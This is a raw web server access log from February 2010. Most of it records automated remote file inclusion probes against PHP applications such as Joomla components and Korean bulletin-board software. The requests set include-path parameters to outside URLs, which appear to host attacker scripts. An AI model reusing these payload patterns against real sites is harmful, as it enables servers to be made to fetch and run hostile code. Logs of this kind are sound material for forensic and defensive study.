58.150.99.144 - - [14/Feb/2010:08:52:42 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:08:52:42 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:08:52:42 -0800] "GET /logs/access_100107.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:52:54 -0800] "GET /logs/access_100123.log%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:52:56 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:53:00 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:53:00 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:53:02 -0800] "GET /logs/access_100123.log%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:53:06 -0800] "GET /logs/access_100123.log%20//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:53:47 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:53:47 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:08:53:48 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:54:09 -0800] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:54:09 -0800] "GET /logs//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:54:09 -0800] "GET /logs/access_100114.log%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:08:54:14 -0800] "GET /logs/access_100111.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:08:54:18 -0800] "GET /logs/access_100115.log%20%20//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:54:53 -0800] "GET /logs/access_100126.log%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:00 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:06 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:09 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:55:29 -0800] "GET /logs/access_100117.log//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:55:29 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:55:29 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:43 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:55:45 -0800] "GET /zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:55:45 -0800] "GET /logs//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.139.0.75 - - [14/Feb/2010:08:55:45 -0800] "GET /logs/access_100117.log%20%20//zboard/skin/dognara_gallery/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:48 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:48 -0800] "GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:49 -0800] "GET /logs/access_100123.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:51 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:55:53 -0800] "GET /logs//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:08:56:38 -0800] "GET /logs/access_100107.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:08:56:38 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:08:56:38 -0800] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [14/Feb/2010:08:56:42 -0800] "GET /config/dbutil.bck.php?confdir=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
222.122.197.10 - - [14/Feb/2010:08:59:29 -0800] "GET /logs/access_100111.log//lib/Loggix/Module/Calendar.php?pathToIndex=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.63" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:59:57 -0800] "GET /includes/kb_constants.php?module_root_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:08:59:57 -0800] "GET /logs/includes/kb_constants.php?module_root_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:09:08:03 -0800] "GET /logs/access_100114.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:08:36 -0800] "GET /logs/access_100116.log/includes/kb_constants.php?module_root_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:08:48 -0800] "GET /logs/access_100121.log/includes/kb_constants.php?module_root_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.11.20.41 - - [14/Feb/2010:09:09:12 -0800] "GET /logs/access_100122.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.nofaultattorneys.com/images/.bash/id1.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:09:09:27 -0800] "GET /logs/access_100202.log//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:09:09:29 -0800] "GET /logs/access_100203.log///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:09:09:48 -0800] "GET /logs/access_100115.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:09:10:01 -0800] "GET /logs/access_100114.log//accounts/inc/include.php?language=0&lang_settings[0][1]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.136 - - [14/Feb/2010:09:10:21 -0800] "GET /logs/access_100203.log//bbs/write_comment_update.php?board_skin_path=http://ticcamp.co.kr/include/css/idtasikfeel.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:10:26 -0800] "GET /logs/access_100114.log//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywaves.com//av/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:10:26 -0800] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywaves.com//av/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [14/Feb/2010:09:10:26 -0800] "GET /logs//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.babywaves.com//av/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [14/Feb/2010:09:10:42 -0800] "GET /logs/access_091227.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
210.116.103.118 - - [14/Feb/2010:09:10:59 -0800] "GET /logs/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [14/Feb/2010:09:10:59 -0800] "GET /logs/access_100109.log%20%20/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [14/Feb/2010:09:10:59 -0800] "GET /addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [14/Feb/2010:09:11:12 -0800] "GET /logs/access_100112.log%20%20/addevent.inc.php?agendax_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:09:11:21 -0800] "GET /logs/access_100203.log%20%20//write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [14/Feb/2010:09:11:21 -0800] "GET /write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:11:35 -0800] "GET /logs/access_100104.log/index.php?Load=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:11:35 -0800] "GET /logs/index.php?Load=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [14/Feb/2010:09:11:36 -0800] "GET /index.php?Load=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:11:40 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [14/Feb/2010:09:11:42 -0800] "GET /mail/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [14/Feb/2010:09:11:42 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/mail/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [14/Feb/2010:09:11:43 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/mail/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
125.141.91.138 - - [14/Feb/2010:09:11:44 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:11:44 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:11:47 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:11:47 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:11:48 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:02 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:10 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:11 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:12:12 -0800] "GET /logs/access_100116.log/includes/kb_constants.php?module_root_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:12 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:14 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:14 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:16 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:18 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:21 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:22 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:24 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:24 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:24 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:26 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:33 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:12:39 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:12:39 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:12:42 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:43 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:09:12:50 -0800] "GET /logs/access_100109.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://belalalang.fileave.com/pirates1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [14/Feb/2010:09:12:52 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:13:20 -0800] "GET /logs/access_100121.log/includes/kb_constants.php?module_root_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:13:21 -0800] "GET ////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:13:21 -0800] "GET /logs/access_100202.log/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:13:21 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:13:32 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:13:32 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:13:32 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:13:38 -0800] "GET /logs/access_100203.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.153 - - [14/Feb/2010:09:13:44 -0800] "GET /logs/access_100205.log/////delete_comment.php?board_skin_path=http://ato.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:24 -0800] "GET /logs/access_100130.log/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:24 -0800] "GET /logs/access_100130.log/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:24 -0800] "GET /step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:24 -0800] "GET /step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:24 -0800] "GET /logs/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:24 -0800] "GET /logs/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:36 -0800] "GET /logs/access_100130.log/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:36 -0800] "GET /logs/step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [14/Feb/2010:09:14:36 -0800] "GET /step_one.php?server_inc=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:15:08 -0800] "GET /logs/access_100118.log%20%20/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:15:08 -0800] "GET /main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [14/Feb/2010:09:15:08 -0800] "GET /logs/main.php?x=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [14/Feb/2010:09:15:23 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
